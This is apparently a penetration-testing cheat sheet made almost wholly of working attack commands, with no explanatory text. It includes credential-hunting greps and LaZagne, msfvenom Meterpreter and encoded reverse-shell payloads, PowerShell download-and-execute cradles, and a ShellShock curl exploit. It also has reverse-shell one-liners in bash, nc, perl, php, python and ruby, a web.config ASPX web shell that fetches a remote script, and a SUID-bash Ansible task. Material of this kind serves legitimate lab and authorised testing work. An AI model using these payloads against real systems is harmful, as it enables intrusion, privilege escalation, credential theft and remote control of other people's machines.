find / -user <user> 2>/dev/null | grep -v proc 2>/dev/null
find / -user <user> -ls 2>/dev/null | grep -v proc 2>/dev/null

find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null

grep for Passwords

grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf

JAWS

IEX(New-Object Net.webclient).downloadString('http://<local_ip>:<local_port>/jaws-enum.ps1')

Juicy Potato

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <local_ip>
msf6 exploit(multi/handler) > set LPORT <local_ip>
msf6 exploit(multi/handler) > run

.\exploit.exe

LaZagne

laZagne.exe all

nishang

cd path/to/nishang/Shells/
cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1

tail -3 Invoke-PowerShellTcp.ps1
}

Invoke-PowerShellTcp -Reverse -IPAddress <local_ip> -Port <local_port>

powershell "IEX(New-Object Net.Webclient).downloadString('http://<local_ip>:<local_port>/Invoke-PowerShellTcp.ps1')"

Powershell & Powercat

Set-ExecutionPolicy Unrestricted

powershell -Command "$PSVersionTable.PSVersion"    # check powershell version

powershell -c "[Environment]::Is64BitProcess"    # check for 64bit powershell

cmd /c powershell -nop -exec bypass -c "iex(new-object net.webclient).downloadstring('http://<local_ip>:<local_port>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <local_ip> -Port <local_port>"

powershell -c "(new-object System.Net.WebClient).DownloadFile(\"http://<local_ip>:<local_port>/nc.exe\",\"C:\Users\Public\Downloads\nc.exe\")"

powershell (New-Object System.Net.WebClient).UploadFile('http://<local_ip>/upload.php', '<file>')

powershell -c "Invoke-Webrequest -Uri \"http://<local_ip>:<local_port>/shell.exe\" -OutFile \"C:\Users\Public\Downloads\shell.exe\""

<remote_ip>/node/3?cmd=powershell -c IEX(New-object System.net.webclient).DownloadString('http://<local_ip>:<local:port>/Sherlock.ps1');Find-AllVulns

echo "IEX (New-object System.net.webclient).DownloadString('http://<local_ip>:<local_port>/shell.ps1')" | powershell -noprofile -

ShellShock

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1' http://<remote_ip>/cgi-bin/user.sh

Shikata Ga Nai

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/shell.exe

Windows Tasks & Services

tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

sc query
sc qc <service-name>
accesschk.exe -uws "Everyone" "C:\Program Files"

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt

wmic qfe get Caption,Description,HotFixID,InstalledOn    # no new patches - KEXP pretty likely

Writeable Directories in Linux

/dev/shm
/tmp

Reverse Shells

bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1
bash -c 'bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1'

http://<target_url>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_ip> <local_port>/tmp/f")--    # lua

nc -e /bin/sh <local_ip> <local_port>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_ip> <local_port> >/tmp/f

perl -e 'use Socket;$i="<local_ip>";$p=<local_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php -r '$sock=fsockopen("<local_ip>",<local_port>);exec("/bin/sh -i <&3 >&3 2>&3");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",<local_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",<local_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

ruby -rsocket -e'f=TCPSocket.open("<local_ip>",<local_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Templates

ASPX Web Shell

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.10/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

Bad YAML

- hosts: localhost
  tasks:
    - name: badyml
      command: chmod +s /bin/bash

Exploit Skeleton Python Script

#!/usr/bin/python

import socket,sys

address = '127.0.0.1'
port = 9999
buffer = #TBD

try:
	print '[+] Sending buffer'
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((address,port))
	s.recv(1024)
	s.send(buffer + '\r\n')
except:
 	print '[!] Unable to connect to the application.'
 	sys.exit(0)
finally:
	s.close()

JSON POST Request

POST /<path> HTTP/1.1
Host: <remote_ip>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close

{
  "auth":{
    "name":"<user>",
    "password":"<password>"
  },
  "filename":"<file>"
}